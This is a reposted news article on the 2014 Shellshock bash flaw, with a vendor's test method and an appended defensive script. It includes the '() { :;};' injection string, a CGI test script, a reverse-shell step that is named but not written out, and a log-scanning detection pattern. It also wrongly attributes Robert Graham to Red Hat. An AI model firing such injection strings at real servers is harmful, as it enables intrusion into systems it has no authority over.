Serious security vulnerability found in Bash on Linux, and how to fix it

Source: Internet
Author: User

Beijing time, September 25: Linux users got another "surprise" today. The Red Hat security team found an obscure and dangerous security hole in the bash shell, which is widely used on Linux. The vulnerability is referred to as the "Bash bug" or "Shellshock".

When reached in the right way, the vulnerability lets an attacker's code execute as if it had been typed at the shell, which opens the door to a variety of attacks. To make matters worse, the bug has been present in Linux for a long time, so while patching any single Linux machine is easy, patching every affected system is almost impossible.

Red Hat and Fedora have released patches for the vulnerability. It could also affect OS X, but Apple has not yet released an official patch.

This bash vulnerability may be more dangerous than Heartbleed.

-- Robert Graham (@ErrataRob) September 24, 2014

Robert David Graham of Red Hat compares the vulnerability with Heartbleed, finding that the former is more widespread and likely to have a long-term impact on system security. "There is a lot of software interacting with the shell in some way, and we have no way to enumerate all the software that is affected by the vulnerability," Graham wrote in a blog post. According to The Verge, Nicholas Weaver, a researcher at Berkeley ICSI, agrees: "It's very obscure, scary, and it'll be with us for years."

Tod Beardsley, an engineering manager at the cybersecurity firm Rapid7, warns that the severity rating of the Bash vulnerability is "10", meaning it poses the greatest possible threat to users' computers, while its complexity rating is "low", meaning attackers can exploit it relatively easily.

In addition, Dan Guido, CEO of the network security company Trail of Bits, said that the Heartbleed vulnerability could let attackers eavesdrop on users' computers but not take control of them, and that exploiting the bash vulnerability is also simpler: just cut and paste a line of code.

Google security researcher Tavis Ormandy said on Twitter that the patches from Linux distributors appeared to be "incomplete", raising concerns among several security experts. (Editor in charge: Tan Mingzhu)

This article is reproduced from Linux China; the original text is from The Verge, and part of the content has been omitted.

360 Security Center has now published a test method for the "Bash" vulnerability, and reminds websites and enterprises to apply the security patch to their services promptly to avoid significant risk.
"Bash" vulnerability test method
1) Local test
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
A vulnerable bash prints "vulnerable" before "this is a test", because it keeps executing the exported variable past the end of the function definition; a patched bash does not print "vulnerable".
2) Remote test
First, write a CGI script in Bash:
root@kali:/usr/lib/cgi-bin# cat bug.sh
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-type" content="text/html; charset=utf-8">'
echo '<title>PoC</title>'
echo '</head>'
echo '<body>'
echo '<pre>'
/usr/bin/env
echo '</pre>'
echo '</body>'
echo '</html>'
exit 0
Put it in /usr/lib/cgi-bin and then use curl to access it.
It prints out the environment variables, which shows that the CGI can be reached normally (the web server copies request headers into the CGI process's environment, which is why a vulnerable bash behind a CGI script is reachable from outside). Next, bounce back a shell.
Access it to see the results:
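Two defender-side checks in the same spirit as the test method above, written as an added example (not from the original article or from 360 Security Center). The function names and the sample access log are my own constructions; the local check wraps the exact env test given above and turns it into a machine-readable verdict, and the log check looks for the function-definition marker "() {" that a remote attempt carries in a request header.

```shell
#!/bin/sh
# Added example, not from the original article. Function names are hypothetical.

# 1) Local check: same env test as the article, but with a verdict instead of
#    eyeballing the output. A vulnerable bash parses the exported variable as a
#    function definition and keeps executing past the closing brace, so the
#    trailing "echo vulnerable" runs before the real command does.
shellshock_local_check() {
    out=""
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 0; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null) || true
    case "$out" in
        *vulnerable*) echo "vulnerable" ;;
        *)            echo "patched" ;;
    esac
}

# 2) Log check: the remote variant reaches bash through CGI because the web
#    server copies request headers (User-Agent, Referer, ...) into the CGI
#    process's environment. A header value starting with "() {" is the thing to
#    alert on. Prints matching lines with their line numbers; exit status is
#    0 if anything matched, 1 otherwise (plain grep semantics).
scan_log_for_shellshock() {
    grep -n '() *{' "$1"
}

# Constructed sample access log (combined format) for the demo. Line 2 carries
# the same harmless test string the article uses, placed in the User-Agent.
make_sample_log() {
    cat > "$1" <<'EOF'
10.0.0.5 - - [25/Sep/2014:10:01:02 +0800] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "-" "curl/7.35.0"
10.0.0.9 - - [25/Sep/2014:10:01:07 +0800] "GET /cgi-bin/bug.sh HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
10.0.0.5 - - [25/Sep/2014:10:01:09 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
EOF
}

# Stand-alone demo: verdict for this host, then the suspicious log line(s).
echo "local bash: $(shellshock_local_check)"
demo_log=$(mktemp)
make_sample_log "$demo_log"
scan_log_for_shellshock "$demo_log" || echo "no suspicious requests"
rm -f "$demo_log"
```

Pointing scan_log_for_shellshock at a real access log (or at a header dump) gives the same line-numbered hits, so the function can sit directly in a cron job or a log-shipping pipeline.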
